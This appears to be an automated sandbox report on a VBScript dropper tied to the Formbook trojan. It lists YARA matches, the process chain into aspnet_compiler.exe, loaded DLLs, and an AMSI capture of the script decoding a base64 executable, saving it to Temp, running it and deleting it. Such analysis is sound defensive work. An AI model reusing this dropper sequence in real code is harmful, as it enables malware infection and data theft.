Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135ADE0	4_2_0135ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360C00	4_2_01360C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350CF2	4_2_01350CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400CB5	4_2_01400CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01380F30	4_2_01380F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013A2F28	4_2_013A2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D4F40	4_2_013D4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DEFA0	4_2_013DEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136CFE0	4_2_0136CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01352FC8	4_2_01352FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141EE26	4_2_0141EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360E59	4_2_01360E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141EEDB	4_2_0141EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01372E90	4_2_01372E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141CE93	4_2_0141CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0142B16B	4_2_0142B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134F172	4_2_0134F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0139516C	4_2_0139516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136B1B0	4_2_0136B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0140F0CC	4_2_0140F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141F0E0	4_2_0141F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014170E9	4_2_014170E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013670C0	4_2_013670C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141132D	4_2_0141132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134D34C	4_2_0134D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013A739A	4_2_013A739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013652A0	4_2_013652A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014012ED	4_2_014012ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137B2C0	4_2_0137B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01417571	4_2_01417571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013FD5B0	4_2_013FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01351460	4_2_01351460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141F43F	4_2_0141F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141F7B0	4_2_0141F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014116CC	4_2_014116CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01369950	4_2_01369950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137B950	4_2_0137B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CD800	4_2_013CD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013638E0	4_2_013638E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141FB76	4_2_0141FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137FB80	4_2_0137FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0139DBF9	4_2_0139DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D5BF0	4_2_013D5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01417A46	4_2_01417A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141FA49	4_2_0141FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D3A6C	4_2_013D3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0140DAC6	4_2_0140DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013FDAAC	4_2_013FDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013A5AA0	4_2_013A5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01411D5A	4_2_01411D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01417D73	4_2_01417D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01363D40	4_2_01363D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137FDC0	4_2_0137FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D9C32	4_2_013D9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141FCF2	4_2_0141FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141FF09	4_2_0141FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01361F92	4_2_01361F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01323FD2	4_2_01323FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01323FD5	4_2_01323FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141FFB1	4_2_0141FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01369EB0	4_2_01369EB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 01395130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0134B970 appears 272 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 013A7E54 appears 98 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 013CEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 013DF290 appears 105 times

Source: QT2Q1292300924.vbs

Initial sample: Strings found which are bigger than 50

Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2136321349.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2136079152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 2.2.temp_exec.exe.3051804.2.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 2.2.temp_exec.exe.63d0000.7.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 2.2.temp_exec.exe.30594a8.6.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: classification engine

Classification label: mal100.troj.evad.winVBS@7/2@1/1

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Mutant created: NULL

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\QT2Q1292300924.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: QT2Q1292300924.vbs

Virustotal: Detection: 16%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\QT2Q1292300924.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

VBScript performs obfuscated calls to suspicious functions

Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: temp_exec.exe, 00000002.00000002.2093264557.0000000003059000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000003051000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2094437417.00000000063D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\PAPANKEMOUWO.pdbBSJB source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000000.2047235189.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, temp_exec.exe.0.dr
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000004.00000002.2136494432.0000000001320000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: temp_exec.exe, 00000002.00000002.2093264557.0000000003059000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000003051000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2094437417.00000000063D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.2136494432.0000000001320000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\PAPANKEMOUWO.pdb source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000000.2047235189.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, temp_exec.exe.0.dr

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\temp_exec.exe", "1", "true");IDictionary.Add("@@", "A");IDictionary.Add("))", "T");IDictionary.Add(";;;", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Keys();IDictionary.Item("@@");IDictionary.Item("))");IDictionary.Item(";;;");IDictionary.Item("...");IDictionary.Item("&&&");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADX4+WYAAAAAAAAAAOAADgELATAAAJAAAAD8AAAAAAAAeq8");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\temp_exec.exe", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp\temp_exec.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\temp_exec.exe");IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\temp_exec.exe")

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E5998 push eax; ret	2_2_014E59B2
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E5875 push eax; ret	2_2_014E59B2
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E5875 push eax; ret	2_2_014E59F2
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E5875 push eax; ret	2_2_014E5A02
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E5A18 push eax; ret	2_2_014E5A22
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E5A28 push eax; ret	2_2_014E5A32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00407041 push cs; iretd	4_2_00407042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0041705E push edi; iretd	4_2_00417060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_004030F0 push eax; ret	4_2_004030F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0041C8FC push cs; iretd	4_2_0041C8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401949 push 63DCA26Ah; ret	4_2_0040194E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0040214B push edx; retf	4_2_0040214E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00402101 push ebp; iretd	4_2_0040210D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0040210E push eax; retf	4_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_004021A4 push eax; retf	4_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0041125B pushfd ; ret	4_2_0041125E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_004242D9 push esp; ret	4_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_004242E3 push esp; ret	4_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401AB8 push edx; retf	4_2_00401AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00413416 push ecx; iretd	4_2_00413417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0041ECDC push ds; iretd	4_2_0041ECDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401DF5 push ebp; iretd	4_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401DA6 push ebp; iretd	4_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00416EAA push esp; retf	4_2_00416EAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401F0D push eax; retf	4_2_00401F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401FEB push edx; retf	4_2_00401FEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00410FEE push ebp; iretd	4_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00410FF3 push ebp; iretd	4_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401FA4 push edx; ret	4_2_00401FAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401FBA push 0000006Ah; iretd	4_2_00401FC6
